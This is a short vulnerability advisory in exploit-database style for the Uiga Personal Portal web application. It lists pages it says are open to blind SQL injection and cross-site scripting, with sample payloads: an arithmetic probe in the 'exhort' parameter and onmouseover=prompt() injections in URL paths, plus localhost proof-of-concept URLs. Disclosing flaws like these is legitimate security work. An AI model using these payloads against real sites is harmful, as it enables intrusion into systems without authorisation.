# Exploit Title: Uiga Personal Portal Multiple Vulnerability # Date: 2011 # Author: Eyup CELIK # Version: All Version # Tested on: All versions are Vulnerability # Web Site: www.eyupcelik.com.tr ISSUE Blind SQL Injection and XSS can be done using the command input Vulnerable Page: index.php cart.php includes/photoview.php index2.php Example: index.php?exhort=%24&view=ar_det cart.php/ includes/photoview.php/ index2.php/ Exploit: index.php?exhort=%2440-2+2*3-6&view=ar_det cart.php/"onmouseover=prompt(955787)> includes/photoview.php/"onmouseover=prompt(955787)> index2.php/"onmouseover=prompt(955787)> POC: 127.0.0.1/uigaportal/index.php?exhort=%2440-2+2*3-6&view=ar_det 127.0.0.1/uigaportal/cart.php/%22onmouseover=prompt(955787)%3E